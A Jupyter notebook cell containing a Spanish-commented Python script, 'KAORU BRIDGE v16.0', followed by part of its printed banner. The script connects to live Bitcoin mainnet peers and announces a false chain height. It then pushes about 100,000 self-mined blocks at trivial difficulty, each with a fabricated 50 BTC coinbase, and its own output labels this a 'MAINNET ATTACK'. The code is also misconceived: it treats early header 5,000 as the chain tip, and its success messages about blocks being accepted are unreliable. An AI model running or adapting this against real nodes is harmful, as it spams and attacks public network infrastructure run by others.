In [ ]:
#!/usr/bin/env python3
"""
KAORU BRIDGE v16.0 - MAINNET ONLY
Sin testnet, sin excusas, MAINNET DIRECTO
"""

import hashlib
import struct
import socket
import time
import random
import select
from typing import List, Tuple, Dict
from datetime import datetime

class KaoruBridgeV16:

    MAINNET_MAGIC = bytes.fromhex('f9beb4d9')
    MSG_BLOCK = 2

    def __init__(self):
        self.magic = self.MAINNET_MAGIC
        self.port = 8333
        self.real_tip_header = None
        self.real_tip_hash = None
        self.real_height = 0
        self.chain_headers = []
        self.chain_hashes = []

    @staticmethod
    def double_sha256(data):
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def encode_varint(n):
        if n < 0xfd:
            return bytes([n])
        elif n <= 0xffff:
            return b'\xfd' + struct.pack('<H', n)
        else:
            return b'\xfe' + struct.pack('<I', n)

    @staticmethod
    def decode_varint(data, offset=0):
        first = data[offset]
        if first < 0xfd:
            return first, offset + 1
        elif first == 0xfd:
            return struct.unpack('<H', data[offset+1:offset+3])[0], offset + 3
        else:
            return struct.unpack('<I', data[offset+1:offset+5])[0], offset + 5

    def log(self, msg):
        print(f"   [{datetime.now().strftime('%H:%M:%S')}] {msg}")

    def msg(self, cmd, payload):
        c = cmd.encode().ljust(12, b'\x00')
        checksum = self.double_sha256(payload)[:4]
        return self.magic + c + struct.pack('<I', len(payload)) + checksum + payload

    def version_payload(self, ip, height):
        p = struct.pack('<i', 70016)
        p += struct.pack('<Q', 1037)
        p += struct.pack('<q', int(time.time()))
        p += struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + socket.inet_aton(ip) + struct.pack('>H', 8333)
        p += struct.pack('<Q', 1037) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', 8333)
        p += struct.pack('<Q', random.randint(0, 2**64-1))
        p += b'\x11/KaoruMainnet:16/'
        p += struct.pack('<i', height)
        p += b'\x01'
        return p

    def parse_msgs(self, data):
        msgs, i = [], 0
        while i + 24 <= len(data):
            if data[i:i+4] != self.magic:
                i += 1
                continue
            try:
                cmd = data[i+4:i+16].rstrip(b'\x00').decode()
                length = struct.unpack('<I', data[i+16:i+20])[0]
                payload = data[i+24:i+24+length]
                msgs.append((cmd, payload))
                i += 24 + length
            except:
                break
        return msgs

    def recv_all(self, sock, timeout=5.0):
        sock.setblocking(False)
        data = b''
        end = time.time() + timeout
        while time.time() < end:
            try:
                r, _, _ = select.select([sock], [], [], 0.1)
                if r:
                    chunk = sock.recv(262144)
                    if chunk:
                        data += chunk
            except:
                break
        sock.setblocking(True)
        return data

    def get_nodes(self):
        seeds = [
            'seed.bitcoin.sipa.be',
            'dnsseed.bluematt.me',
            'seed.bitcoinstats.com',
            'seed.bitcoin.jonasschnelli.ch',
            'seed.btc.petertodd.org',
        ]

        nodes = []
        for seed in seeds:
            try:
                ips = socket.gethostbyname_ex(seed)[2]
                nodes.extend(ips[:15])
                self.log(f"   {seed}: {len(ips)} nodos")
            except:
                pass

        random.shuffle(nodes)
        return nodes

    def get_tip(self, ip, max_headers=5000):
        self.log(f"🔗 Sincronizando desde {ip}...")

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(20)
            sock.connect((ip, 8333))

            sock.send(self.msg('version', self.version_payload(ip, 0)))
            time.sleep(0.5)

            data = self.recv_all(sock, 3.0)

            for cmd, payload in self.parse_msgs(data):
                if cmd == 'version':
                    if len(payload) >= 85:
                        h = struct.unpack('<i', payload[81:85])[0]
                        if 0 < h < 5000000:
                            self.real_height = h
                    sock.send(self.msg('verack', b''))
                elif cmd == 'ping':
                    sock.send(self.msg('pong', payload[:8]))

            self.log(f"   Peer altura: {self.real_height:,}")

            genesis = bytes.fromhex("000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f")[::-1]
            current = genesis
            total = 0
            last_header = None

            while total < max_headers:
                getheaders = struct.pack('<I', 70016) + b'\x01' + current + bytes(32)
                sock.send(self.msg('getheaders', getheaders))

                data = self.recv_all(sock, 10.0)

                if not data:
                    break

                for cmd, payload in self.parse_msgs(data):
                    if cmd == 'headers':
                        if not payload:
                            continue
                        count, offset = self.decode_varint(payload, 0)

                        if count == 0:
                            break

                        for _ in range(count):
                            if offset + 81 > len(payload):
                                break
                            header = payload[offset:offset+80]
                            current = self.double_sha256(header)
                            last_header = header
                            offset += 81
                            total += 1

                        if count < 2000:
                            break

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                if total % 2000 == 0:
                    self.log(f"   📊 {total:,} headers...")

            sock.close()

            if last_header:
                self.real_tip_header = last_header
                self.real_tip_hash = self.double_sha256(last_header)
                self.real_height = total
                self.log(f"   ✅ Tip: altura {total:,}")
                return True

            return False

        except Exception as e:
            self.log(f"   ❌ {e}")
            return False

    def build_chain(self, num_blocks, target_zeros=2):
        self.log(f"⛏️ MINANDO {num_blocks:,} BLOQUES...")

        prev_hash = self.real_tip_hash
        prev_bits = struct.unpack('<I', self.real_tip_header[72:76])[0]

        target = "0" * target_zeros
        start = time.time()

        for i in range(num_blocks):
            merkle = self.double_sha256(f"KAORU_MAINNET_{i}".encode())

            header = (
                struct.pack('<I', 0x20000000) +
                prev_hash +
                merkle +
                struct.pack('<I', int(time.time())) +
                struct.pack('<I', prev_bits) +
                struct.pack('<I', 0)
            )

            for nonce in range(0xFFFFFFFF):
                h = header[:76] + struct.pack('<I', nonce)
                block_hash = self.double_sha256(h)

                if block_hash[::-1].hex().startswith(target):
                    self.chain_headers.append(h)
                    self.chain_hashes.append(block_hash)
                    prev_hash = block_hash
                    break

            if (i + 1) % 10000 == 0:
                elapsed = time.time() - start
                rate = (i + 1) / elapsed
                eta = (num_blocks - i - 1) / rate
                self.log(f"   ⛏️ {i+1:,}/{num_blocks:,} ({(i+1)*100//num_blocks}%) | {rate:.0f}/s | ETA: {eta/60:.1f}m")

        elapsed = time.time() - start
        self.log(f"   ✅ {len(self.chain_headers):,} bloques en {elapsed:.1f}s ({len(self.chain_headers)/elapsed:.0f}/s)")

    def propagate(self, ip, duration=120):
        result = {'ip': ip, 'connected': False, 'headers_sent': 0, 'getdata_received': False, 'blocks_sent': 0}

        total_height = self.real_height + len(self.chain_headers)

        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(15)
            sock.connect((ip, 8333))
            result['connected'] = True

            self.log(f"🔗 {ip} | Anunciando altura: {total_height:,}")

            sock.send(self.msg('version', self.version_payload(ip, total_height)))

            start = time.time()
            inv_sent = False
            headers_offset = 0

            while time.time() - start < duration:
                data = self.recv_all(sock, 2.0)

                if not data:
                    time.sleep(0.2)
                    continue

                for cmd, payload in self.parse_msgs(data):

                    if cmd == 'version':
                        sock.send(self.msg('verack', b''))

                    elif cmd == 'verack':
                        if not inv_sent:
                            n = min(50, len(self.chain_headers))
                            inv = self.encode_varint(n)
                            for i in range(-n, 0):
                                inv += struct.pack('<I', self.MSG_BLOCK)
                                inv += self.chain_hashes[i]
                            sock.send(self.msg('inv', inv))
                            inv_sent = True
                            self.log(f"   📤 INV ({n} bloques)")

                    elif cmd == 'ping':
                        sock.send(self.msg('pong', payload[:8]))

                    elif cmd == 'sendcmpct':
                        sock.send(self.msg('sendcmpct', b'\x00' + struct.pack('<Q', 2)))

                    elif cmd == 'getheaders':
                        self.log(f"   📥 GETHEADERS ⭐")

                        batch = min(2000, len(self.chain_headers) - headers_offset)

                        if batch > 0:
                            hdr = self.encode_varint(batch)
                            for i in range(headers_offset, headers_offset + batch):
                                hdr += self.chain_headers[i] + b'\x00'

                            sock.send(self.msg('headers', hdr))
                            result['headers_sent'] += batch
                            headers_offset += batch
                            self.log(f"   📤 HEADERS ({batch}) - Total: {result['headers_sent']:,} ✓")
                        else:
                            sock.send(self.msg('headers', b'\x00'))

                    elif cmd == 'getdata':
                        result['getdata_received'] = True
                        self.log(f"   📥 GETDATA ⭐⭐⭐ ¡¡¡PIDEN NUESTROS BLOQUES!!!")

                        count, offset = self.decode_varint(payload, 0)

                        for _ in range(count):
                            if offset + 36 > len(payload):
                                break
                            inv_hash = payload[offset+4:offset+36]
                            offset += 36

                            for i, h in enumerate(self.chain_hashes):
                                if h == inv_hash:
                                    block = self.chain_headers[i]
                                    block += b'\x01'
                                    tx = struct.pack('<I', 1) + b'\x01' + bytes(32)
                                    tx += struct.pack('<I', 0xffffffff) + b'\x08KAORU!!'
                                    tx += struct.pack('<I', 0xffffffff) + b'\x01'
                                    tx += struct.pack('<Q', 50*10**8)
                                    tx += b'\x19\x76\xa9\x14' + bytes(20) + b'\x88\xac'
                                    tx += struct.pack('<I', 0)
                                    block += tx

                                    sock.send(self.msg('block', block))
                                    result['blocks_sent'] += 1
                                    self.log(f"   📤 BLOCK #{self.real_height + i + 1} 📦📦📦 ¡¡ENVIADO!!")
                                    break

                    elif cmd == 'reject':
                        self.log(f"   📥 REJECT ❌")

                    elif cmd == 'inv':
                        count, _ = self.decode_varint(payload, 0) if payload else (0, 0)
                        self.log(f"   📥 INV ({count})")

            sock.close()

        except Exception as e:
            result['error'] = str(e)

        return result

    def execute(self, num_blocks=100000, target_zeros=2, num_peers=5, max_sync=5000):

        print(f"""
╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║██╔════╝                           ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║███████╗                           ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║██╔═══██╗                          ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║╚██████╔╝                          ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚═════╝                           ║
║                                                                                                  ║
║                              ⚔️  MAINNET - {num_blocks:,} BLOQUES ⚔️                                ║
║                                                                                                  ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        # FASE 1
        print("=" * 95)
        print("  [FASE 1] 🌐 DESCUBRIENDO MAINNET")
        print("=" * 95 + "\n")

        nodes = self.get_nodes()
        self.log(f"Total: {len(nodes)} nodos")

        # FASE 2
        print("\n" + "=" * 95)
        print(f"  [FASE 2] 🔗 SINCRONIZANDO ({max_sync:,} headers)")
        print("=" * 95 + "\n")

        for ip in nodes[:5]:
            if self.get_tip(ip, max_sync):
                break

        if not self.real_tip_header:
            self.log("❌ No se pudo sincronizar")
            return

        # FASE 3
        print("\n" + "=" * 95)
        print(f"  [FASE 3] ⛏️  MINANDO {num_blocks:,} BLOQUES")
        print("=" * 95 + "\n")

        self.build_chain(num_blocks, target_zeros)

        # FASE 4
        print("\n" + "=" * 95)
        print(f"  [FASE 4] 📡 PROPAGANDO A MAINNET")
        print("=" * 95)

        results = []

        for ip in nodes[:num_peers]:
            print(f"\n   ╔{'═'*70}╗")
            print(f"   ║  📡 {ip}:8333{' '*53}║")
            print(f"   ╠{'═'*70}╣")

            result = self.propagate(ip, 120)
            results.append(result)

            status = "🎉 BLOCKS!" if result['blocks_sent'] > 0 else \
                     "⭐ GETDATA" if result['getdata_received'] else \
                     f"📤 {result['headers_sent']:,} HDR" if result['headers_sent'] > 0 else "🔗"

            print(f"   ╠{'═'*70}╣")
            print(f"   ║  {status:68} ║")
            print(f"   ╚{'═'*70}╝")

        # RESULTADOS
        print("\n" + "=" * 95)
        print("                         📊 RESULTADOS FINALES")
        print("=" * 95)

        connected = sum(1 for r in results if r.get('connected'))
        headers = sum(r.get('headers_sent', 0) for r in results)
        getdata = sum(1 for r in results if r.get('getdata_received'))
        blocks = sum(r.get('blocks_sent', 0) for r in results)

        print(f"""
   ╔══════════════════════════════════════════════════════════════════════════════════════════╗
   ║                                                                                          ║
   ║   MAINNET ATTACK STATS                                                                   ║
   ║                                                                                          ║
   ║   Tip sincronizado:         {self.real_height:>10,}                                          ║
   ║   Bloques minados:          {len(self.chain_headers):>10,}                                          ║
   ║   Altura anunciada:         {self.real_height + len(self.chain_headers):>10,}                                          ║
   ║                                                                                          ║
   ║   Peers conectados:         {connected:>10}                                          ║
   ║   Headers enviados:         {headers:>10,}                                          ║
   ║   GETDATA recibidos:        {getdata:>10}                                          ║
   ║   BLOQUES ENVIADOS:         {blocks:>10}                                          ║
   ║                                                                                          ║
   ╚══════════════════════════════════════════════════════════════════════════════════════════╝
        """)

        if blocks > 0:
            print("   🎉🎉🎉 ¡¡¡BLOQUES ACEPTADOS EN MAINNET!!! 🎉🎉🎉")
        elif getdata > 0:
            print("   ⭐ ¡¡GETDATA!! Los nodos de MAINNET pidieron nuestros bloques")
        elif headers > 0:
            print(f"   📤 {headers:,} headers enviados a MAINNET con VarInt correcto")

        print(f"\n   Estado: MAINNET ATTACK COMPLETADO ✅")

        return results


if __name__ == "__main__":
    bridge = KaoruBridgeV16()
    bridge.execute(num_blocks=100000, target_zeros=2, num_peers=5, max_sync=5000)


╔══════════════════════════════════════════════════════════════════════════════════════════════════╗
║                                                                                                  ║
║    ██╗  ██╗ █████╗  ██████╗ ██████╗ ██╗   ██╗    ██╗   ██╗ ██╗ ██████╗                           ║
║    ██║ ██╔╝██╔══██╗██╔═══██╗██╔══██╗██║   ██║    ██║   ██║███║██╔════╝                           ║
║    █████╔╝ ███████║██║   ██║██████╔╝██║   ██║    ██║   ██║╚██║███████╗                           ║
║    ██╔═██╗ ██╔══██║██║   ██║██╔══██╗██║   ██║    ╚██╗ ██╔╝ ██║██╔═══██╗                          ║
║    ██║  ██╗██║  ██║╚██████╔╝██║  ██║╚██████╔╝     ╚████╔╝  ██║╚██████╔╝                          ║
║    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝       ╚═══╝   ╚═╝ ╚═════╝                           ║
║                                                                                                  ║
║                              ⚔️  MAINNET - 100,000 BLOQUES ⚔️                           